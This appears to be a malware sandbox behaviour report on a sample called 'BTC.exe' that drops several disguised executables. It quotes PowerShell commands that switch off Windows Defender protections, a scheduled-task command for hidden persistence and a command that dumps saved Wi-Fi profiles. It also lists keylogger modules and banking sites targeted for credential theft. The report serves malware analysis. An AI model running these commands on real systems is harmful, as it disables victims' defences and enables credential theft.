                            Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 97999Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 599869
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 599737
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 599578
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 599156
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 598922
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 598813
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 598682
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 598563
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 598453
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 598344
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 598219
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 598109
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 598000
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 597891
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 597775
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 597656
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 597547
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 597438
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 597313
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 597188
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 597052
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 596922
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 596812
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 596703
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 596594
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 596484
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 596375
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 596266
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 596154
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 596047
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 595937
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 595811
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 595687
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 595578
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 595468
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 595359
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 595250
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 595141
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 595016
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 594903
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 594797
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 594688
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 594569
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 594453
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 594343
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 594231
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 594125
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 594015
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 593906
                            Source: C:\Users\user\AppData\Roaming\update.exeThread delayed: delay time: 593797
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 599868
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 599743
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 599625
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 599514
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 599394
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 599261
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 599156
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 598601
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 598475
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 598359
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 598236
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 598109
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 597983
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 597873
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 597761
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 597631
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 597500
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 597371
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 597263
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 597137
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 597027
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 596922
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 596806
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 596687
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 596578
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 596468
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 596359
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 596231
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 596124
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 595768
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 595500
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 595390
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 595281
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 595171
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 595062
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 594953
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 594843
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 594734
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 594625
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 594515
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 594406
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 594297
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 594182
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 594062
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 593953
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 593838
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 593719
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 593605
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 593472
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 593344
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 593234
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 593125
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 593016
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 592904
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 592793
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeThread delayed: delay time: 922337203685477
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: discord.comVMware20,11696428655f
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                            Source: svchost.exe, 00000004.00000002.4526855238.0000000005B60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlllightSavingsTime
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: global block list test formVMware20,11696428655
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                            Source: Window Security.exe, 00000057.00000002.2595221845.0000000000C7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y,
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                            Source: crack.exe, 00000002.00000002.2042909870.0000000000961000.00000004.00000020.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2834850034.0000000001375000.00000004.00000020.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4454908243.000000000079D000.00000004.00000020.00020000.00000000.sdmp, Windows Security Health Service.exe, 0000001A.00000002.4563359135.000000001B7C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: AMC password management pageVMware20,11696428655
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
                            Source: Window Security.exe, 00000057.00000002.2595221845.0000000000C7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yw
                            Source: svchost.exe.0.drBinary or memory string: vmware
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                            Source: Windows Defender Service Host.exe, 00000007.00000002.4537546476.000000001C1A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                            Source: Window Security.exe, 0000005D.00000002.2725226506.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                            Source: update.exe, 00000005.00000002.4556173792.00000000056DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllne
                            Source: svchost.exe.0.drBinary or memory string: VMwareVBox
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                            Source: BTC.exe, 00000000.00000002.2010201525.0000000000DFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                            Source: tmpFF2F.tmp.dat.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 4_2_05C10B20 LdrInitializeThunk,4_2_05C10B20
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Roaming\update.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\BTC.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 104.16.185.241 80Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeNetwork Connect: 172.67.196.114 443Jump to behavior
                            Yara detected Powershell download and execute
                            Source: Yara matchFile source: Process Memory Space: Window Security.exe PID: 2680, type: MEMORYSTR
                            .NET source code references suspicious native API functions
                            Source: Cracked.exe.0.dr, Keylogger.csReference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                            Source: Cracked.exe.0.dr, DInvokeCore.csReference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
                            Source: Cracked.exe.0.dr, AntiProcess.csReference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
                            Source: Windows Defender Service Host.exe.0.dr, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
                            Disables Windows Defender (via service or powershell)
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
                            Modifies Windows Defender protection settings
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                            Source: C:\Users\user\AppData\Roaming\Window Security.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\crack.exe "C:\Users\user\AppData\Roaming\crack.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\Cracked.exe "C:\Users\user\AppData\Roaming\Cracked.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\BTC.exeProcess created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\crack.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE49C.tmp.cmd""Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exitJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE306.tmp.bat""Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe" Jump to behavior
